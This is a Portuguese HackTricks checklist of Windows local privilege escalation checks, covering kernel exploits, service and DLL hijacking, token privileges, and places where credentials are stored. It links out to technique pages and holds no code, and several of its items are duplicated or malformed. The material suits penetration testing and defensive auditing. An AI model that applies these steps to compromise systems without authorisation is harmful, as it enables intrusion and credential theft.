* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
### **Melhor ferramenta para procurar vetores de escalonamento de privilégios locais no Windows:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
### **Melhor ferramenta para procurar vetores de escalação de privilégios locais no Windows:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
### [Informações do Sistema](windows-local-privilege-escalation/#system-info)
* [ ] Obter [**informações do sistema**](windows-local-privilege-escalation/#system-info)
* [ ] Procurar por **exploits do kernel usando scripts**](windows-local-privilege-escalation/#version-exploits)
* [ ] Usar o **Google para procurar** por **exploits do kernel**
* [ ] Usar o **searchsploit para procurar** por **exploits do kernel**
* [ ] Obter [**Informações do sistema**](windows-local-privilege-escalation/#system-info)
* [ ] Procurar por **exploits de kernel** [**usando scripts**](windows-local-privilege-escalation/#version-exploits)
* [ ] Usar **Google para procurar** por exploits de **kernel**
* [ ] Usar **searchsploit para procurar** por exploits de **kernel**
* [ ] Informações interessantes em [**variáveis de ambiente**](windows-local-privilege-escalation/#environment)?
* [ ] Senhas em [**histórico do PowerShell**](windows-local-privilege-escalation/#powershell-history)?
* [ ] Informações interessantes em [**configurações de Internet**](windows-local-privilege-escalation/#internet-settings)?
* [
* [ ] Senhas no [**histórico do PowerShell**](windows-local-privilege-escalation/#powershell-history)?
* [ ] Informações interessantes nas [**configurações de Internet**](windows-local-privilege-escalation/#internet-settings)?
* [ ] [**Unidades de disco**](windows-local-privilege-escalation/#drives)?
* [ ] [**Exploit WSUS**](windows-local-privilege-escalation/#wsus)?
* [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)?
### [Enumeração de Logging/AV](windows-local-privilege-escalation/#enumeration)
* [ ] Verificar configurações de [**Auditoria**](windows-local-privilege-escalation/#audit-settings) e [**WEF**](windows-local-privilege-escalation/#wef)
* [ ] Verificar [**LAPS**](windows-local-privilege-escalation/#laps)
* [ ] Verificar se [**WDigest**](windows-local-privilege-escalation/#wdigest) está ativo
* [ ] [**Proteção LSA**](windows-local-privilege-escalation/#lsa-protection)?
* [ ] [**Guarda de Credenciais**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
* [ ] [**Credenciais em Cache**](windows-local-privilege-escalation/#cached-credentials)?
* [ ] Verificar se há algum [**AV**](windows-av-bypass)
* [ ] [**Política AppLocker**](authentication-credentials-uac-and-efs#applocker-policy)?
* [ ] [**UAC**](authentication-credentials-uac-and-efs/uac-user-account-control)
* [ ] [**Privilégios de Usuário**](windows-local-privilege-escalation/#users-and-groups)
* [ ] Verificar [**privilégios do usuário atual**](windows-local-privilege-escalation/#users-and-groups)
* [ ] Você é [**membro de algum grupo privilegiado**](windows-local-privilege-escalation/#privileged-groups)?
* [ ] Verificar se você tem [algum desses tokens habilitados](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege**?
* [ ] [**Sessões de Usuários**](windows-local-privilege-escalation/#logged-users-sessions)?
* [ ] Verificar [**homes dos usuários**](windows-local-privilege-escalation/#home-folders) (acesso?)
* [ ] Verificar [**Política de Senhas**](windows-local-privilege-escalation/#password-policy)
* [ ] O que está [**dentro da Área de Transferência**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)?
### [Rede](windows-local-privilege-escalation/#network)
* [ ] Verificar [**informações atuais da rede**](windows-local-privilege-escalation/#network)
* [ ] Verificar **serviços locais ocultos** restritos ao exterior
### [Processos em Execução](windows-local-privilege-escalation/#running-processes)
* [ ] Permissões de [**arquivos e pastas de processos**](windows-local-privilege-escalation/#file-and-folder-permissions)
* [ ] [**Mineração de Senhas em Memória**](windows-local-privilege-escalation/#memory-password-mining)
* [ ] [**Aplicativos GUI Inseguros**](windows-local-privilege-escalation/#insecure-gui-apps)
### [Serviços](windows-local-privilege-escalation/#services)
* [ ] [Você pode **modificar algum serviço**?](windows-local-privilege-escalation#permissions)
* [ ] [Você pode **modificar** o **binário** que é **executado** por algum **serviço**?](windows-local-privilege-escalation/#modify-service-binary-path)
* [ ] [Você pode **modificar** o **registro** de algum **serviço**?](windows-local-privilege-escalation/#services-registry-modify-permissions)
* [ ] [Você pode se aproveitar de algum **caminho de binário de serviço não citado**?](windows-local-privilege-escalation/#unquoted-service-paths)
### [**Aplicações**](windows-local-privilege-escalation/#applications)
* [ ] **Permissões de escrita em aplicações instaladas**](windows-local-privilege-escalation/#write-permissions)
* [ ] [**Aplicações de Inicialização**](windows-local-privilege-escalation/#run-at-startup)
* [ ] **Drivers** [**Vulneráveis**](windows-local-privilege-escalation/#drivers)
### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking)
* [ ] Você pode **escrever em alguma pasta dentro do PATH**?
* [ ] Há algum serviço conhecido que **tenta carregar alguma DLL inexistente**?
* [ ] Você pode **escrever** em alguma **pasta de binários**?
### [Rede](windows-local-privilege-escalation/#network)
* [ ] Enumerar a rede (compartilhamentos, interfaces, rotas, vizinhos, ...)
* [ ] Observar especialmente os serviços de rede que escutam no localhost (127.0.0.1)
### [Credenciais do Windows](windows-local-privilege-escalation/#windows-credentials)
* [ ] Credenciais de [**Winlogon**](windows-local-privilege-escalation/#winlogon-credentials)
* [ ] Credenciais do [**Cofre do Windows**](windows-local-privilege-escalation/#credentials-manager-windows-vault) que você poderia usar?
* [ ] Credenciais [**DPAPI**](windows-local-privilege-escalation/#dpapi) interessantes?
* [ ] Senhas de [**redes Wifi salvas**](windows-local-privilege-escalation/#wifi)?
* [ ] Informações interessantes em [**conexões RDP salvas**](windows-local-privilege-escalation/#saved-rdp-connections)?
* [ ] Senhas em [**comandos recentemente executados**](windows-local-privilege-escalation/#recently-run-commands)?
* [ ] Senhas do [**Gerenciador de Credenciais de Área de Trabalho Remota**](windows-local-privilege-escalation/#remote-desktop-credential-manager)?
* [ ] [**AppCmd.exe**](windows-local-privilege-escalation/#appcmd-exe) existe? Credenciais?
* [ ] [**SCClient.exe**](windows-local-privilege-escalation/#scclient-sccm)? Carregamento Lateral de DLL?
### [Arquivos e Registro (Credenciais)](windows-local-privilege-escalation/#files-and-registry-credentials)
* [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **e** [**Chaves de host SSH**](windows-local-privilege-escalation/#putty-ssh-host-keys)
* [ ] [**Chaves SSH no registro**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
* [ ] Senhas em [**arquivos não supervisionados**](windows-local-privilege-escalation/#unattended-files)?
* [ ] Algum backup de [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups)?
* [ ] [**Credenciais na nuvem**](windows-local-privilege-escalation/#cloud-credentials)?
* [ ] Arquivo [**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist.xml)?
* [ ] [**Senha GPP em Cache**](windows-local-privilege-escalation/#cached-gpp-pasword)?
* [ ] Senha no [**arquivo de configuração do IIS Web**](windows-local-privilege-escalation/#iis-web-config)?
* [ ] Informações interessantes nos [**logs da web**](windows-local-privilege-escalation/#logs)?
* [ ] Você quer [**solicitar credenciais**](windows-local-privilege-escalation/#ask-for-credentials) ao usuário?
* [ ] Arquivos interessantes [**dentro da Lixeira**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)?
* [ ] Outros [**registros contendo credenciais**](windows-local-privilege-escalation/#inside-the-registry)?
* [ ] Dentro dos dados do [**Navegador**](windows-local-privilege-escalation/#browsers-history) (dbs, histórico, favoritos, ...)?
* [ ] [**Busca genérica de senhas**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) em arquivos e registro
* [ ] [**Ferramentas**](windows-local-privilege-escalation/#tools-that-search-for-passwords) para busca automática de senhas
### [Manipuladores Vazados](windows-local-privilege-escalation/#leaked-handlers)
* [ ] Você tem acesso a algum manipulador de um processo executado pelo administrador?
### [Impersonação de Cliente de Pipe](windows-local-privilege-escalation/#named-pipe-client-impersonation)
* [ ] Verifique se você pode abusar disso
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>